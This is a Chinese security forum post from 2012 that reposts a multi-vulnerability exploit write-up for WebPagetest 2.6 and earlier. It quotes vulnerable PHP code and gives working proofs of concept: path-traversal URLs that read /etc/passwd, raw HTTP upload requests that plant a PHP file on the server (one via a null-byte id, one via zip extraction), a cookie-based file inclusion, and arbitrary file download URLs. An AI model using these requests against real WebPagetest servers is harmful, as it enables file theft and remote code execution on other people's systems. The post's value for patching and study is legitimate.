查看: 8569|回复: 2

WebPagetest <= 2.6多重缺陷

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2012-7-17 09:31:01 | 显示全部楼层 |阅读模式
    [code=PHP][ WebPagetest <= 2.6 ]  Multiple Vulnerabilities  #
    #####################################################
    #
    # Script: "WebPagetest provides a system for testing the performance of web pages from multiple
    #          locations/configurations and consuming the results in a friendly web interface. "
    #
    开发者: http://www.webpagetest.org/about
    下载地址: http://code.google.com/p/webpagetest/downloads/list
    #
    #####################################################
    # [ 本地文件泄露 #1 ]
    # PoC: http://www.ihonker.org /gettext.php?file=../../../../../../../../../../../etc/passwd
    #
    # File: ./webpagetest/gettext.php (lines: 2-13)
    #  ..cut..
      include('common.inc');                                         // 1
      $ok = false;

      if( isset($_GET['file']) && strlen($_GET['file']) )            // 2
      {
          $data = gz_file_get_contents("$testPath/{$_GET['file']}"); // 3
          if( $data !== false )
          {
              $ok = true;
              echo $data;                                            // 7 [LFD]
          }
      }
    #  ..cut..
    #
    # File: ./webpagetest/common.inc (lines: 493-510)
    #  ..cut..
      function gz_file_get_contents($file)
      {
          $data = null;

          $zip = gzopen("$file.gz", 'rb');
          if( $zip === false )
              $zip = gzopen($file, 'rb');                             // 4

          if( $zip !== false )
          {
              $data = gzread($zip, 10000000);                         // 5
              gzclose($zip);
          }
          else
              $data = false;

          return $data;                                               // 6
      }
    #  ..cut..
    #
    #####################################################
    # [ 本地文件泄露 #2 ]
    # PoC: http://www.xxx.com /gettcpdump.php?file=../../../../../../../../../etc/passwd
    #
    # File: ./webpagetest/gettcpdump.php (lines: 2-13)
    #  ..cut..
      include('common.inc');                                            // 1
      $file = "$testPath/{$_GET['file']}";                              // 2

      if( isset($_GET['file']) && strlen($_GET['file']) && gz_is_file($file) ) // 3
      {
          header ("Content-type: application/octet-stream");
          gz_readfile_chunked($file);                                   // 5
      }
    #  ..cut..
    #
    # File: ./webpagetest/common.inc (lines: 460-486, 586-590)
    #  ..cut..
      function gz_readfile_chunked($filename, $retbytes = TRUE)
      {
          $buffer = '';
          $cnt =0;
          $handle = gzopen("$filename.gz", 'rb');
          if ($handle === false)
              $handle = gzopen($filename, 'rb');                        // 6
          if ($handle === false)
              return false;
          while (!gzeof($handle))
          {
              $buffer = gzread($handle, 1024 * 1024);  // 1MB at a time // 7
              echo $buffer;                                             // 8 [LFD]
    #  ..cut..
          }
    #  ..cut..
          return $status;
      }
    #  ..cut..
      function gz_is_file($filename)
      {
          $ret = is_file("$filename.gz") || is_file($filename);         // 4
          return $ret;                                                  //
      }
    #  ..cut..
    #
    #####################################################
    # [ Local File Disclosure #3 ]
    # PoC: http://localhost/getgzip.php?file=../../../../../../../../../etc/passwd
    # It's a very similar case, as above.
    #
    #####################################################
    # [ Arbitrary File Upload #1 ]
    # File: ./webpagetest/work/resultimage.php (lines: 18-48)
    #  ..cut..
      $locKey = $locations[$location]['key'];
      if( (!strlen($locKey) || !strcmp($key, $locKey)) || !strcmp($_SERVER['REMOTE_ADDR'], "127.0.0.1") )  // 1 true
      {
          if( isset($_FILES['file']) )                                                                     // 2
          {
              $fileName = $_FILES['file']['name'];                                                         // 3
              $path = './' . GetTestPath($id);                                                             // $path = './results/'
    #  ..cut..
              logMsg(" Moving uploaded image '{$_FILES['file']['tmp_name']}' to '$path/$fileName'\n");
              move_uploaded_file($_FILES['file']['tmp_name'], "$path/$fileName");                          // 4 [AFU]
          }
          else
              logMsg(" no uploaded file attached");
      }
    #  ..cut..
    # PoC: http://www.xxx.com /work/resultimage.php
      POST /work/resultimage.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: pl,en-us;q=0.7,en;q=0.3
      Accept-Encoding: gzip, deflate
      Connection: keep-alive
      Cache-Control: max-age=0
      Content-Type: multipart/form-data; boundary=---------------------------31101243933548
      Content-Length: 209
      -----------------------------31101243933548
      Content-Disposition: form-data; name="file"; filename="info.php"
      Content-Type: text/x-php

      <?php phpinfo(); ?>

      -----------------------------31101243933548--
    # Uploaded file will be here: http://localhost/results/info.php
    #
    #####################################################
    # [ 任意文件上传 #2 ]
    # File: ./webpagetest/work/dopublish.php (lines: 2-31)
    #  ..cut..
      require_once('../lib/pclzip.lib.php');                              // 1
      include '../common.inc';
      header('Content-type: text/plain');
      header("Cache-Control: no-cache, must-revalidate");
      header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");
      set_time_limit(300);

      // make sure a file was uploaded
      if( isset($_FILES['file']) )                                        // 2
      {
          $fileName = $_FILES['file']['name'];                            // 3

          // create a new test id
          $today = new DateTime("now", new DateTimeZone('America/New_York'));
          $id = $today->format('ymd_') . md5(uniqid(rand(), true));       // 4

          $path = '../' . GetTestPath($id);                               // 5

          // create the folder for the test results
          if( !is_dir($path) )
              mkdir($path, 0777, true);
       
          // extract the zip file
          $archive = new PclZip($_FILES['file']['tmp_name']);             // 6
          $list = $archive->extract(PCLZIP_OPT_PATH, "$path/", PCLZIP_OPT_REMOVE_ALL_PATH); // 7 [AFU]
          if( !$list )
              unset($id);

          echo $id;
      }
    #  ..cut..
    # In this case, we need to create the zip archive, which contains our php file (info.php).
    # While uploading, archive will be automatically unzipped to the appropriate folder.
    # PoC: http://localhost/work/dopublish.php
      POST /work/dopublish.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: pl,en-us;q=0.7,en;q=0.3
      Accept-Encoding: gzip, deflate
      Connection: keep-alive
      Content-Type: multipart/form-data; boundary=---------------------------4966737613931
      Content-Length: 214
      -----------------------------4966737613931
      Content-Disposition: form-data; name="file"; filename="info.zip"
      Content-Type: application/x-zip-compressed


      [zip file]

      -----------------------------4966737613931--
    # After file uploading, script prints some string. For example: 120711_718a3a42e314a0cb740ee66b7b92b9ac.
    # This means, uploaded and unzipped file is in folder /results/12/07/11/718a3a42e314a0cb740ee66b7b92b9ac/
    # Uploaded file will be here: http://localhost/results/12/07/11/718a3a42e314a0cb740ee66b7b92b9ac/info.php
    #
    #####################################################
    # [ Arbitrary File Upload #3 ] magic_quotes_gpc = Off;
    # File: ./webpagetest/work/workdone.php (lines: 12-45)
    #  ..cut..
      $id = $_REQUEST['id'];                                             // 1
    #  ..cut..
      if( $_REQUEST['video'] )                                           // 2
      {
          logMsg("Video file $id received from $location");

          $dir = './' . GetVideoPath($id);                               // 3
          if( isset($_FILES['file']) )                                   // 4
          {
              $dest = $dir . '/video.mp4';                               // 5 $dest = ./results/video/../info.php%00/video.mp4
              move_uploaded_file($_FILES['file']['tmp_name'], $dest);    // 6 [AFU]
    #  ..cut..
          }
      }
    #  ..cut..
    # PoC: http://localhost/work/workdone.php?video=1&id=../info.php%00
      POST /work/workdone.php?video=1&id=../info.php%00 HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: pl,en-us;q=0.7,en;q=0.3
      Accept-Encoding: gzip, deflate
      Connection: keep-alive
      Content-Type: multipart/form-data; boundary=---------------------------187161971819895
      Content-Length: 211
      -----------------------------187161971819895
      Content-Disposition: form-data; name="file"; filename="info.php"
      Content-Type: text/x-php

      <?php phpinfo(); ?>

      -----------------------------187161971819895--
    # Uploaded file will be here: http://localhost/results/info.php
    #
    #####################################################
    # [ Local File Inclusion ] magic_quotes_gpc = Off;
    # File: ./webpagetest/about.php (line: 20)
    #  ..cut..
      include 'header.inc';                                             // 1
    #  ..cut..
    #
    # File: ./webpagetest/header.inc (lines: 43-47)
    #  ..cut..
               elseif(isset($_COOKIE["cfg"]))
                   $testLoc = $_COOKIE["cfg"];                          // 2
               
               if( isset($testLoc) && strlen($testLoc) && is_file("./custom/$testLoc/headerAd.inc") ) // 3
                   include("./custom/$testLoc/headerAd.inc");           // 4 [LFI]
    #  ..cut..
    #
    # PoC: http://localhost/about.php
      GET /about.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: pl,en-us;q=0.7,en;q=0.3
      Accept-Encoding: gzip, deflate
      Connection: keep-alive
      Cookie: cfg=../../../../../../../../../etc/passwd%00
    #
    #####################################################
    # [ Arbitrary File Download #1 ] register_globals = On
    # PoC: http://localhost/download.php?testPath=./relay/../../../../../../../../../etc/
    # If the "relay" directory exists, the script will compress to a zip archive, all files in
    # a directory that is set in testPath variable. Thereafter, zip archive will be sent to the browser.
    #
    #####################################################
    # [ Arbitrary File Download #2 ] magic_quotes_gpc = Off;
    # PoC: http://localhost/video/download.php?id=../../../../../../../../../../../etc/passwd%00
    #
    #####################################################

    [/code]

    游客,如果您要查看本帖隐藏内容请回复
    回复

    使用道具 举报

    cdz上善若水 该用户已被删除
    发表于 2012-7-18 17:36:14 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-7-30 16:04:00 | 显示全部楼层
    观摩学习中
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-28 12:08 , Processed in 0.020319 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部